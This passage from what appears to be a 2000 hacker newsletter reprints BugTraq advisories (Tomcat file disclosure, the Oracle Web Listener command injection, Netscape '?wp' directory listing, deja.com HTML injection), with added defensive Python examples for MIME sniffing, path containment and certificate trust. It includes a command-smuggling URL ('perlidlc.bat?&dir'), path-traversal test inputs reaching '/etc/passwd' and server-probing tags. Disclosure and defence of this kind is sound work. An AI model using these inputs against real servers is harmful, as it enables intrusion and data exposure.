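    (b"%PDF", "application/pdf"),
)
HTML_RE = re.compile(rb"<\s*(!doctype|html|head|body|script)\b", re.IGNORECASE)

# What a well-behaved server would declare for each extension (constructed).
TYPE_BY_EXT = {
    "html": "text/html", "htm": "text/html", "txt": "text/plain",
    "exe": "application/x-dosexec", "zip": "application/zip", "pdf": "application/pdf",
}


def sniff_type(body: bytes) -> str:
    """Classify a body by its leading bytes, ignoring every label."""
    head = body[:512]
    for prefix, mime in SIGNATURES:
        if head.startswith(prefix):
            return mime
    if HTML_RE.search(head):
        return "text/html"
    try:
        head.decode("utf-8")
    except UnicodeDecodeError:
        return "application/octet-stream"
    return "text/plain"


def should_scan(declared_mime: str, filename: str, body: bytes,
                skip_types: frozenset[str] = frozenset()) -> tuple[bool, str]:
    """Return (scan?, reason).

    skip_types is the gateway's 'safe file types' policy expressed as sniffed
    types.  The default, an empty set, is the post's option 1 with the list
    cleared: scan everything.
    """
    sniffed = sniff_type(body)
    declared = declared_mime.split(";", 1)[0].strip().lower()
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    ext_type = TYPE_BY_EXT.get(ext)
    # A label that disagrees with the bytes is itself a reason to scan:
    # renaming a file or lying in Content-Type cannot talk the gateway out of it.
    if declared != sniffed or (ext_type is not None and ext_type != sniffed):
        return True, f"label mismatch: declared={declared} ext={ext_type} content={sniffed}"
    if sniffed in skip_types:
        return False, f"content is {sniffed}, on the skip list"
    return True, f"content is {sniffed}"


# Constructed sample bodies.  FAKE_EXE is just an MZ header plus padding, not a
# runnable program; it stands in for the post's virus file.
FAKE_EXE = b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00"
PLAIN_HTML = b"<html><body>Hello</body></html>"

if __name__ == "__main__":
    # The post's cases: the same executable served as .html and as .txt,
    # and the renamed variant served as text/html.
    for mime, name in (("text/html", "test1.html"), ("text/plain", "test1.txt"),
                       ("text/html", "test2.txt")):
        print(name, mime, should_scan(mime, name, FAKE_EXE))
    print("page.html text/html", should_scan("text/html", "page.html", PLAIN_HTML,
                                              frozenset({"text/html"})))
```

With an empty skip list every download is scanned, which is the only setting the post's findings support; the function's value is in showing that even with a populated skip list the two relabelling tricks in the report (a text/html Content-Type, a swapped extension) each trigger a scan instead of avoiding one.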
By adjusting the webserver to send out *.txt as MIME type TEXT/HTML and *.html as MIME type TEXT/PLAIN you can now test with http://website/test2.txt and http://website/test2.html to verify things.

Downloading http://website/test2.txt will get you infected as ESPG will not scan the file. And downloading http://website/test2.html will not work as ESPG detects the virus and will prevent it from downloading.

CONCLUSION
----------

Esafe Protect Gateway can at present not be trusted to protect you from downloading a virus.

VERSIONS
--------

Esafe Protect Gateway v2.1 build 98. Virus tables dated March 15, 2000.

STATUS
------

Manufacturer notified. No fix available. Results have not been confirmed yet. However I was able to verify that the problem lies with Esafe and not with Check Point by using Trend Micro's CVP server instead, which did not suffer from the same problem.

Hugo.

@HWA

94.0 HNS:Bug in Apache project: Jakarta Tomcat
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 22, 2000

The Apache project: Jakarta Tomcat contains a serious security bug. Tomcat is used together with the Apache web server to serve Java Server Pages and Java servlets. ...

Bug in Apache project: Jakarta Tomcat
Posted to BugTraq on March 22, 2000

The Apache project: Jakarta Tomcat contains a serious security bug. Tomcat is used together with the Apache web server to serve Java Server Pages and Java servlets. Summary from the Tomcat development team advisory is posted below:

Advisory:

Delivered with Tomcat is an example (jsp/source.jsp) that can be used to deliver the contents of any file on your machine.

Recommended action:

The simplest course of action is to simply remove this example from your machine. Alternatively, you can replace the associated ShowSource.class file with one from the current 3.1 beta.
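The source.jsp example reads whatever file name the request supplies. As an added example, not Tomcat's code and not from Jan Madsen's post, the resolver below shows two ways of stopping that: the narrow check that refuses any request containing "..", and a containment check that decodes and normalises the name and requires the result to stay under the context root. Only the containment check covers the whole class of escapes (absolute paths, ".." hidden behind URL encoding), and it stops rejecting harmless names such as "notes..txt". The context root "/webapps/examples" is a constructed value.

```python
"""Resolving a request-supplied file name inside a servlet context.

Added example for the Tomcat source.jsp advisory above; not Tomcat code.
contains_dotdot() is the coarse substring check; resolve_in_context() is the
containment property every file reference has to satisfy.
"""
from __future__ import annotations

import posixpath
from urllib.parse import unquote


class PathEscapesContext(ValueError):
    """Raised when a requested name resolves outside the web application."""


def contains_dotdot(requested: str) -> bool:
    """The coarse check: reject anything that literally contains '..'."""
    return ".." in requested


def resolve_in_context(context_root: str, requested: str) -> str:
    """Map `requested` (raw value from the request) to a path under context_root.

    Raises PathEscapesContext if the name cannot be served from this context.
    """
    # Decode exactly once: the decoded string is what the filesystem would see.
    decoded = unquote(requested)
    # A context-relative resource is never absolute and never carries
    # separators or bytes that a lower layer might interpret differently.
    if decoded.startswith("/") or "\\" in decoded or "\x00" in decoded:
        raise PathEscapesContext(requested)
    root = posixpath.normpath(context_root)
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    # Containment: after normalisation the result must still be strictly
    # below the context root, whatever the calling page did with the name.
    if not candidate.startswith(root + "/"):
        raise PathEscapesContext(requested)
    return candidate


def escapes(context_root: str, requested: str) -> bool:
    """True if resolve_in_context() refuses the request."""
    try:
        resolve_in_context(context_root, requested)
    except PathEscapesContext:
        return True
    return False


if __name__ == "__main__":
    root = "/webapps/examples"          # constructed context root
    for name in ("jsp/source.jsp", "jsp/notes..txt", "../../etc/passwd",
                 "%2e%2e/%2e%2e/etc/passwd", "/etc/passwd"):
        print(f"{name!r:32} dotdot={contains_dotdot(name)!s:5} escapes={escapes(root, name)}")
```

The demo output makes the difference visible: "jsp/notes..txt" trips the substring check but is served fine by the resolver, while the percent-encoded name passes the substring check and is caught only by containment.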
Fixes:

Fixes have been made to the core of Tomcat to not allow any file references to be resolved outside of the context being used for the resolution. Additionally, a change has been made to ShowSource.java to disallow any requests which contain the string "..". The 3.1 beta 1 release has been refreshed with these fixes applied.

Med venlig hilsen/Best regards/Freundliche Grüße
Jan Madsen
S e c u r i t y w o r k e r s

@HWA

95.0 HNS:MS SECURITY BULLETIN #18
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 21, 2000

Microsoft has released a patch that eliminates a security vulnerability in Microsoft Internet Information Server 4.0. The vulnerability could allow a malicious user to consume all resources on a web server and prevent it from servicing other users. ...

MS SECURITY BULLETIN #18
Posted to BugTraq on March 21, 2000

Microsoft Security Bulletin (MS00-018)
--------------------------------------

Patch Available for "Chunked Encoding Post" Vulnerability

Originally Posted: March 20, 2000

Summary
=======

Microsoft has released a patch that eliminates a security vulnerability in Microsoft(r) Internet Information Server 4.0. The vulnerability could allow a malicious user to consume all resources on a web server and prevent it from servicing other users.

Frequently asked questions regarding this vulnerability can be found at http://www.microsoft.com/technet/security/bulletin/fq00-018.asp.

Issue
=====

IIS 4.0 supports chunked encoding transfers, but does not limit the size of the buffer that can be reserved. This would allow a malicious user to request an extremely large buffer for a POST or PUT operation, but never actually send data, thereby blocking memory on the server that had been allocated to the session. If sufficient memory on the server were blocked in this fashion, it could prevent the server from performing useful work.
There is no capability through this attack to create, modify or delete data on the server, nor is there any capability to usurp administrative control of the server. If the malicious user closed his session, the memory would be released and the server's operation would return to normal. Otherwise, the machine could be put back into normal service by stopping and restarting the service.

Affected Software Versions
==========================

- Microsoft Internet Information Server 4.0

Patch Availability
==================

- X86: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=19761
- Alpha: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=19762

NOTE: Additional security patches are available at the Microsoft Download Center

@HWA

96.0 HNS:S.A.F.E.R. Security Bulletin 000317
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 20, 2000

A problem exists in Netscape Enterprise Server that can allow a remote user to obtain a list of directories and subdirectories on the server ...

S.A.F.E.R. Security Bulletin 000317
Posted to BugTraq on March 20, 2000

S.A.F.E.R. Security Bulletin 000317.EXP.1.5
______________________________________________

TITLE    : Netscape Enterprise Server and '?wp' tags
DATE     : March 17, 2000
NATURE   : Remote user can obtain list of directories on Netscape Enterprise Server
AFFECTED : Netscape Enterprise Server 3.x

PROBLEM:

A problem exists in Netscape Enterprise Server that can allow a remote user to obtain a list of directories and subdirectories on the server.

DETAILS:

Netscape Enterprise Server with 'Web Publishing' enabled can be tricked into displaying the list of directories and subdirectories, if the user supplies certain 'tags'. For example:

http://home.netscape.com/?wp-cs-dump

will reveal the contents of the root directory on that web server. Contents of subdirectories can be obtained as well.
Other tags that can be used are:

?wp-ver-info
?wp-html-rend
?wp-usr-prop
?wp-ver-diff
?wp-verify-link
?wp-start-ver
?wp-stop-ver
?wp-uncheckout

FIXES:

Disable 'Web Publishing'.

It is safe to assume that 'Web Publishing' is not the only feature that will 'activate' this problem. We have found a few servers running Netscape Enterprise Server that did not have 'Web Publishing' enabled, but were still vulnerable to this problem. Until Netscape makes an official response and clarifies what the cause of this problem is, it is advised that you test your server against this vulnerability, and if you are vulnerable, try to disable certain features and services.

Netscape has been contacted on many occasions, but has failed to respond.

S.A.F.E.R. - Security Alert For Enterprise Resources
Copyright (c) 2000 The Relay Group

@HWA

97.0 HNS:Decon fix for con/con is vulnerable
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 18, 2000

If you had the con problem and installed the Decon fix, you are now vulnerable to another Win 95 (possibly)/98 (tested) crash which is worse than the previous one. ...

Decon fix for con/con is vulnerable
Posted to BugTraq on March 18, 2000

If you had the con problem and installed the Decon fix, you are now vulnerable to another Win 95 (possibly)/98 (tested) crash which is worse than the previous one.

Software affected : All versions of Microsoft Internet Explorer (It doesn't work in Netscape Navigator)

Actual problem : Type an existing server in the address box, and then request a nonexistent file with a name of >300 symbols. After the server sends its reply to the browser your system stops responding at all; Control+Alt+Del works but you won't see the box with the running tasks, so the only thing you can do is REBOOT. Somebody can deface some good website and create a redirect with 0 seconds waiting to such a link.

Example : http://www.amsouth.com/(lot of aaaa's).html

Fix : Delete the Decon fix from the startup folder :) Now you are vulnerable to con/con.
Hello to Cre@tor

Speedo
mailto:Tima@au.ru

@HWA

98.0 HNS:Cerberus Information Security Advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 17, 2000

The Cerberus Security Team has discovered a number of issues with Oracle's Web Listener, part of the Oracle Application Server, that can allow a remote attacker to run arbitrary commands on the web server ...

Cerberus Information Security Advisory
Posted to BugTraq on March 17, 2000

Released         : 15th March 2000
Name             : Oracle
Affected Systems : Oracle Web Listener 4.0.x on Windows NT
Issue            : Attackers can run arbitrary commands on the webserver

Description
***********

The Cerberus Security Team has discovered a number of issues with Oracle's Web Listener, part of the Oracle Application Server, that can allow a remote attacker to run arbitrary commands on the web server.

Details
*******

Part of the problem is caused by default settings after OAS has been installed. The "ows-bin" virtual directory on an Oracle Web Listener is the equivalent of the "cgi-bin" on other web servers and by default this is set to C:\orant\ows\4.0\bin - this directory not only contains a number of batch files, DLLs and executables but also the binary image file for the Listener itself. Even if this default setting has been changed, however, you may still be at risk if you have batch files in the new "ows-bin" directory.

Arbitrary Command Execution
***************************

The Oracle Web Listener will execute batch files as CGI scripts and by making a request to a batch file that requires one or more arguments it is possible to execute any command the attacker wants by building a special query string. For example the following will give a directory listing:

http://charon/ows-bin/perlidlc.bat?&dir

It is even possible to use UNC paths so the Listener will connect to the remote machine over NBSession, download the executable and then execute it.
By default the Web Listener process runs in the security context of SYSTEM so any commands issued by an attacker will run with SYSTEM privileges.

Another problem is that the Listener will expand the "*" character so even if the attacker doesn't know the name of a real batch file in the "ows-bin" they can request *.bat?&command

Executables
***********

Some of the executables in the default directory allow attackers to kill services, return configuration information and cause other undesirable events to occur.

Solution:
*********

Due to the severity of this problem Cerberus recommends that the following be actioned immediately. If "ows-bin" is the default then using the Oracle Application Server Manager remove the ows-bin virtual directory or point it to a more benign directory. If "ows-bin" is not the default then verify that there are no batch files in this directory.

A check for this has been added to Cerberus' security scanner, CIS, available from their website.

About Cerberus Information Security, Ltd
****************************************

Cerberus Information Security, Ltd, a UK company, are specialists in penetration testing and other security auditing services. They are the developers of CIS (Cerberus' Internet security scanner) available for free from their website: http://www.cerberus-infosec.co.uk

To ensure that the Cerberus Security Team remains one of the strongest security audit teams available globally they continually research operating system and popular service software vulnerabilities, leading to the discovery of "world first" issues. This not only keeps the team sharp but also helps the industry and vendors as a whole, ultimately protecting the end consumer. As testimony to their ability and expertise one just has to look at exactly how many major vulnerabilities have been discovered by the Cerberus Security Team - over 40 to date, making them a clear leader of companies offering such security services.
Founded in late 1999 by Mark and David Litchfield, Cerberus Information Security, Ltd are located in London, UK but serve customers across the World. For more information about Cerberus Information Security, Ltd please visit their website or call on +44(0) 181 661 7405

Permission is hereby granted to copy or redistribute this advisory but only in its entirety.

Copyright (C) 2000 by Cerberus Information Security, Ltd

@HWA

99.0 HNS:Malicious-HTML vulnerabilities at deja.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 17, 2000

Deja.com does not always escape meta-characters when displaying Usenet articles. This allows an attacker to include arbitrary tags in the HTML sent to people reading the attacker's article at deja.com. ...

Malicious-HTML vulnerabilities at deja.com
Posted to BugTraq on March 17, 2000

Niall Smart, niall@pobox.com

Synopsis
========

deja.com does not always escape meta-characters when displaying Usenet articles. Specifically, the article view page (http://www.deja.com/getdoc.xp) and the thread view page (http://www.deja.com/viewthread.xp) display the subject of the article "as is" between title tags. This allows an attacker to include arbitrary tags in the HTML sent to people reading the attacker's article at deja.com.

There are probably a large number of sites out there with this type of vulnerability; the deja.com example is interesting because it's a busy site with a large amount of relatively users who naively trust it.

Exploit
=======

An attacker can embed any tag in the head or body of the HTML page. This allows numerous attacks including:

Cross Site Scripting:

An attacker can post an article with a link to a script on another server and call that script from the onLoad event handler.

Site Spoofing:

An attacker can use a meta tag to automatically redirect the user to a spoofed version of deja.com.

See the CERT advisory referenced below for more information on this type of attack.
Examples
========

NOTE: The following examples are intended to be harmless, however I take no responsibility for any damage caused by following these links.

JavaScript popup:

http://www.deja.com/getdoc.xp?AN=591804116

Redirection using meta tag:

http://www.deja.com/getdoc.xp?AN=591833344

Notes
=====

I haven't thoroughly tested deja.com's pages, there may be other instances of this error. It would be particularly interesting to find one that didn't require the attacker to include the HTML in the subject field of the article.

This example illustrates how *not* to approach meta-character escaping. If you call a function to escape meta-characters each time the data is inserted into the web page, as deja.com appear to do, you run the risk of occasionally forgetting to do it. deja.com escape correctly in two other places on the article view page but forget once. Instead you should escape them earlier in the data flow, perhaps just after getting the data from the database, thereby precluding the human-error factor.

References
==========

CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests
http://www.cert.org/advisories/CA-2000-02.html

HTML 3.2 Character Entities
http://www.w3.org/TR/REC-html32.html#latin1

@HWA

100.0 HNS:Certificate Validation Error in Netscape Browsers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 17, 2000

The problem is that there is an inherited trust between an expired certificate and an active certificate, where there really shouldn't be. If any trust should be there, it certainly shouldn't be with an expired certificate. ...

Certificate Validation Error in Netscape Browsers
Posted to BugTraq on March 17, 2000

This may not be a normal "BugTraq" issue, since it is more a flaw in trust in a security design than it is an actual bug in software...but none-the-less I think it is something that should be discussed.
I haven't checked this with Microsoft IE, I just noticed it as being a flaw in Netscape (submitted a bug report to them earlier but they are either really busy or have chosen to ignore the report.) Tested in browsers from 4.07 - 4.72, all of which operated in the same fashion.

What is the issue?

The scenario is that a user accesses a website for which they do not currently have trust for the signer of the certificate. They are asked whether they would like to trust the server certificate (until it expires,) which if they respond yes, the web site signer certificate will be stored in the certificate database. You can check on these certificates by clicking on the Security Icon on the browser, then select the Website item from the menu. Once stored in the database, any future access to this site is permitted without warning.

The error occurs when the web site certificate is expired and the new site certificate is valid. Netscape never checks to see if the certificate is expired and replaced with a new certificate, and thus the user can continue to access the site without a warning stating that the certificate is expired and that a new certificate exists for the site (it apparently only checks to see if the new certificate isn't expired.) Manually verifying the old certificate in the database will prove that the certificate is invalid. When the site is properly reissued a certificate, Netscape automatically trusts the new certificate based on the previous certificate...if the previous certificate is removed from the database and the website is re-accessed, the standard warning appears asking the user if they wish to trust the certificate. Since the new certificate is cryptographically different from the old certificate, no trust relationship should exist (only the signer is the same.)

Netscape does not replace the old expired certificate with the new certificate, and does not add the new certificate to the database.
Nor does it tell the user that the new certificate a site is sending does not match a previous certificate.

Why is this a problem?

The problem is that there is an inherited trust between an expired certificate and an active certificate, where there really shouldn't be. If any trust should be there, it certainly shouldn't be with an expired certificate. The idea here is that Netscape should complain about a site which has a certificate different than what Netscape has in its database. When you accept a certificate from a website which you do not already hold a trust with the signer of the certificate, you should be warned if that certificate is no longer valid or when the server has been issued a new one. You are trusting that certificate and its signer, not that site. If the site's certificate changes, you should be warned about the change and asked if you still want to trust the site. If a hacker manages to gain access to the key and the certificate, and changes the key and the certificate, a warning may be the only thing to protect you from that hacker becoming a man in the middle to the attack.

What should be the solution?

An option, in the browser, to allow the user to be warned the first time a certificate changes on a webserver. If the previous certificate is expired, and the current certificate on a site is different, the user should be warned of the change, and asked whether they wish the new certificate to replace the previous one. That way, paranoid users like myself can be warned when a certificate changes, so that we can decide whether the new certificate should be trusted. Of course, if I already trust the certificate signer, then I shouldn't be prompted about the certificate.
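As an added illustration of the check the post above asks for (example code written for this issue, not from the original poster or from Netscape), here is a small Python model of the per-site certificate store: `evaluate_legacy` is a hypothetical reconstruction of the behaviour the post describes, where trust is inherited from a stored entry as long as the signer matches and the new certificate is unexpired, and `evaluate` prompts the user when the stored certificate has expired or the certificate bytes have changed, unless the signer is already trusted. Host names, certificate bytes and dates are constructed sample values.

```python
"""Per-site certificate trust decisions: inherited trust versus
change/expiry detection. Constructed example, not browser code."""
from dataclasses import dataclass
from datetime import datetime, timezone
import hashlib


@dataclass(frozen=True)
class SiteCert:
    host: str
    der: bytes           # certificate bytes as sent by the server (constructed)
    signer: str          # issuer name as the browser would display it
    not_after: datetime  # expiry of this certificate

    def fingerprint(self) -> str:
        # Compare certificates by a digest of their bytes, never by signer name.
        return hashlib.sha256(self.der).hexdigest()


class SiteCertStore:
    """Model of the 'Website' certificate database the post refers to."""

    def __init__(self, trusted_signers=()):
        self.trusted_signers = set(trusted_signers)
        self.entries = {}  # host -> SiteCert the user accepted earlier

    def accept(self, cert: SiteCert) -> None:
        self.entries[cert.host] = cert

    def evaluate_legacy(self, cert: SiteCert, now: datetime):
        """Hypothetical reconstruction of the behaviour described: the stored
        entry's expiry and fingerprint are never compared, so a new certificate
        from the same signer is allowed on the strength of the old one."""
        if cert.signer in self.trusted_signers:
            return "allow", "signer trusted"
        stored = self.entries.get(cert.host)
        if stored is None:
            return "prompt", "no stored certificate for host"
        if cert.not_after <= now:
            return "prompt", "presented certificate is expired"
        if stored.signer == cert.signer:
            return "allow", "inherited from stored certificate"
        return "prompt", "signer changed"

    def evaluate(self, cert: SiteCert, now: datetime):
        """Behaviour the post asks for: prompt when either certificate has
        expired or when the certificate itself differs from the stored one."""
        if cert.signer in self.trusted_signers:
            return "allow", "signer trusted"
        if cert.not_after <= now:
            return "prompt", "presented certificate is expired"
        stored = self.entries.get(cert.host)
        if stored is None:
            return "prompt", "no stored certificate for host"
        if stored.not_after <= now:
            return "prompt", "stored certificate expired; site presents a new one"
        if stored.fingerprint() != cert.fingerprint():
            return "prompt", "certificate changed since it was accepted"
        return "allow", "matches stored certificate"


def _utc(year, month, day):
    return datetime(year, month, day, tzinfo=timezone.utc)


# Constructed sample data reproducing the scenario in the post: the user
# accepted OLD_CERT, it has since expired, and the site now sends NEW_CERT
# issued by the same signer.
OLD_CERT = SiteCert("secure.example.test", b"constructed-old-cert-bytes",
                    "Example CA", _utc(2000, 3, 1))
NEW_CERT = SiteCert("secure.example.test", b"constructed-new-cert-bytes",
                    "Example CA", _utc(2001, 3, 1))
NOW = _utc(2000, 3, 17)


def scenario():
    """Return (legacy decision, fixed decision) for the post's scenario."""
    store = SiteCertStore()
    store.accept(OLD_CERT)
    return store.evaluate_legacy(NEW_CERT, NOW), store.evaluate(NEW_CERT, NOW)


if __name__ == "__main__":
    legacy, fixed = scenario()
    print("legacy:", legacy)   # silently allowed
    print("fixed: ", fixed)    # user is prompted about the change
```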
@HWA

101.0 HNS:"OfficeScan DoS & Message Replay" Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 17, 2000

Trend Micro has released a new version of OfficeScan Corporate Edition - version 3.51 - that eliminates two security vulnerabilities found on previous versions ...

"OfficeScan DoS & Message Replay" Vulnerability
Posted to BugTraq on March 17, 2000

Summary
=======

Trend Micro has released a new version of OfficeScan Corporate Edition - version 3.51 - that eliminates two security vulnerabilities found on previous versions. Previous versions of OfficeScan allow intruders within a firewall to initiate a DoS attack on the OfficeScan client (tmlisten.exe) as well as to capture OfficeScan commands. These commands can be replayed and used to change other OfficeScan client configurations.

Issues
======

Trend OfficeScan version 3.5 or earlier versions perform incomplete parsing and buffer overflow checking in its Windows NT client. If a malicious user has the ability to telnet and submit some form of message to the OfficeScan NT client, the OfficeScan service consumes 100% CPU processing power. In addition, communication between the OfficeScan server and client was established with insufficient encryption and authentication, which allows a malicious user to sniff and replay OfficeScan commands.

Implementation
==============

Trend Micro has corrected the DoS attack issue by correctly parsing and handling commands or arbitrary messages sent to the OfficeScan client. Trend Micro has implemented the MD5 Message-Digest Algorithm to ensure that the commands between the server and the clients can not be decrypted or captured to be replayed to other clients.
For details about the MD5 encryption algorithm see: http://theory.lcs.mit.edu/~rivest/rfc1321.txt

Affected Software Versions
==========================

Trend OfficeScan Corporate Edition 3.0
Trend OfficeScan Corporate Edition 3.11
Trend OfficeScan Corporate Edition 3.13
Trend OfficeScan Corporate Edition 3.5
Trend OfficeScan for Microsoft SBS 4.5

Patch Availability
==================

- http://www.antivirus.com/download/ofce_patch.htm

More Information
================

Please see the following references for more information related to this issue.

- Trend Micro Security Bulletin: http://www.antivirus.com/download/ofce_patch_35.htm
- Frequently Asked Questions: Trend Micro Knowledge Base http://solutionbank.antivirus.com/solutions/faqResult.asp?product=8

Obtaining Support on this Issue
===============================

This is a fully supported release. Information on contacting Trend Micro Technical Support is available at http://www.trend.com/support/default.htm

@HWA

102.0 HNS:MS Security bulletin#17
~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 17, 2000

Microsoft has released a patch that eliminates a security vulnerability in Microsoft(r) Windows(r) 95, Windows 98, and Windows 98 Second Edition. The vulnerability could cause a user's system to crash, if they attempted to access a file or folder whose path contained certain reserved words. ...

MS Security bulletin#17
Posted to BugTraq on March 17, 2000

Microsoft Security Bulletin (MS00-017)
--------------------------------------

Patch Available for "DOS Device in Path Name" Vulnerability

Originally Posted: March 16, 2000

Summary
=======

Microsoft has released a patch that eliminates a security vulnerability in Microsoft(r) Windows(r) 95, Windows 98, and Windows 98 Second Edition. The vulnerability could cause a user's system to crash, if they attempted to access a file or folder whose path contained certain reserved words.
Frequently asked questions regarding this vulnerability can be found at http://www.microsoft.com/technet/security/bulletin/fq00-017.asp.

Issue
=====

DOS device names are reserved words, and cannot be used as folder or file names. When parsing a reference to a file or folder, Windows correctly checks for the case in which a single DOS device name is used in the path, and treats it as invalid. However, it does not check for the case in which the path includes multiple DOS device names. When Windows attempts to interpret the device name as a file resource, it performs an illegal resource access that usually results in a crash.

Because it is not possible to create files or folders that contain DOS device names, it would be unusual for a user to try to access one under normal circumstances. The chief threat posed by this vulnerability is that a malicious user could attempt to entice a user to attempt such an access. For instance, if a web site operator hosted a hyperlink that referenced such a path, clicking the link would result in the user's machine crashing. Likewise, a web page or HTML mail that specified a local file as the source of rendering information could cause the user's machine to crash when it was displayed. If this happened, the machine could be put back into normal service by restarting it.

Affected Software Versions
==========================

- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98 Second Edition

Patch Availability
==================

- Windows 95: http://www.microsoft.com/downloads/release.asp?releaseID=19491
- Windows 98 and Windows 98 Second Edition: http://www.microsoft.com/downloads/release.asp?ReleaseID=19389

NOTE: Additional security patches are available at the Microsoft Download Center

NOTE: The patch will be available shortly at the WindowsUpdate site. When this happens, we will modify the bulletin to provide additional information.
More Information
================

Please see the following references for more information related to this issue.

- Microsoft Security Bulletin MS00-017: Frequently Asked Questions, http://www.microsoft.com/technet/security/bulletin/fq00-017.asp
- Microsoft Knowledge Base article Q256015 discusses this issue and will be available soon.
- Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp.

Obtaining Support on this Issue
===============================

This is a fully supported patch. Information on contacting Microsoft Technical Support is available at http://support.microsoft.com/support/contact/default.asp

Revisions
=========

- March 16, 2000: Bulletin Created.

@HWA

103.0 HNS:Georgi Guninski security advisory #9
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 15, 2000

There is a vulnerability in IE and Outlook 5.x for Win9x/WinNT (probably others) which allows executing arbitrary programs using .eml files. This may be exploited when browsing web pages or opening an email message in Outlook. ...

Georgi Guninski security advisory #9
Posted to BugTraq on March 15, 2000

IE and Outlook 5.x allow executing arbitrary programs using .eml files

Disclaimer:

The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program. Georgi Guninski bears NO responsibility for content or misuse of this program or any derivatives thereof.

Description:

There is a vulnerability in IE and Outlook 5.x for Win9x/WinNT (probably others) which allows executing arbitrary programs using .eml files. This may be exploited when browsing web pages or opening an email message in Outlook. This may lead to taking control over the user's computer. It is also possible to read and send local files.
Details:

The problem is creating files in the TEMP directory with a known name and arbitrary content. One may place a .chm file in the TEMP directory which contains the "shortcut" command, and when the .chm file is opened with the showHelp() method programs may be executed.

This vulnerability may be exploited by an HTML email message in Outlook.

Demonstration which starts Wordpad:
http://www.nat.bg/~joro/eml.html

(Note: George seems to have pulled the script, it gives a 404 now .. - Ed/Cruci)

Workaround: Disable Active Scripting.

Copyright 2000 Georgi Guninski

103.1 PSS:More MSIE crashing info by NtWakO
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Source: Packet Storm Security
http://packetstorm.securify.com/

--[Tuesday, March 21, 2000 by NtWaK0 / biteraser]------------------------------
--[Crash ALL IE 4 / IE 5 on Windows 9x and All NT SPx with *HISTORY* Object]---
--[Tested on Win 9x IE4 IE 5 NT 4.0 SPx +IE 4 IE 5, I guess IE 3 too ?]-------

Here is the story: while having a chat (IRC) with biteraser today heh, he suddenly said *fu*k* hrm... I said what is wrong. He said I JUST CRASHED IE.. After some investigation it turned out to be the *HISTORY* Object :). So if you cut and paste the html code in a file, then open it with IE, you will be able to see the crash.

Note: key line is: , without it IE won't crash and behavior should be #default. It can be exploited more.

--[SNIP]------------------------------------------------------------------------
Crash ALL IE 4 ALL IE 5 on Windows 9x and All NT SPx
--[SNIP]------------------------------------------------------------------------

NOTE: Crash Memory dump.
Application exception occurred:
App: exe\iexplore.dbg (pid=219)
When: 3/21/2000 @ 12:52:24.60
Exception number: c0000005 (access violation)
--[END]---------------------------------------------------------------------

---
Cheers,

|-+-||-+-|-+-|-+-|oOo-(NtWaK0)(Telco. Eng. Etc..)-oOo|-+-|-+-|-+-||-+-|
"The only secure computer is one that's unplugged, locked in a safe, and
buried 20 feet under the ground in a secret location... and i'm not even
too sure about that one" --Dennis Hughes, FBI.
|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-||-+-||-+-|
Live Well Do Good --:)

@HWA

104.0 HNS:Drive Mappings in Interactive Login
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 15, 2000

Issue: Drive Mappings in Interactive Login affect Processes running in
context of Schedule User.
Points indicating this is a bug/security exploit and not by design (as some
have indicated to the author) ...

Drive Mappings in Interactive Login

Posted to BugTraq on March 15, 2000

Issue: Drive Mappings in Interactive Login affect Processes running in
context of Schedule User.

Points indicating this is a bug/security exploit and not by design (as some
have indicated to me):

1. Drive mappings are individual to each user, as seen by their location in
   the registry under HKCU\Network. This point alone indicates a bug. Why
   should the *personal* drive mappings of an interactive login session have
   *any* effect on a service running in a different user context, in a
   supposedly secure environment? They shouldn't, plain and simple.

2. KB Article Q130668 is the only article I could find which has any
   relationship to this issue, but it deals with a "bug" when the drives are
   mapped to Netware Volumes using GSNW. However, reading between the lines,
   one can see that the behavior described (which is identical in both
   Netware and NT drive mappings) is not by design, otherwise, why would they
   state this:

      Microsoft has confirmed this to be a problem in Windows NT Workstation
      and Server versions 3.5, 3.51, and 4.0...

   They do offer up a solution to one half of the problem - that is when the
   scheduled process leaves a mapped drive, which then affects any
   interactive processes by preventing the use of this drive (unless
   appropriate permissions exist for the interactive user). But they make no
   mention of the other half - that a non-privileged user can affect the
   environment of the scheduled process, which is often in a privileged
   account context.

Take the following scenario: A "secure" NT workstation is configured with
scheduler running in a user context that has specific elevated rights in
order to perform unattended administrative functions based on scripts that
are stored on a server. But one of the tasks performed in these scripts
requires a mapped drive letter; UNC paths won't work.
So to be sure, the script begins by mapping a drive letter to the shared
network resource containing the patches and updates placed there when
required. Often these patches are security fixes and the like, and the
scheduler dutifully applies them to some large number of machines as
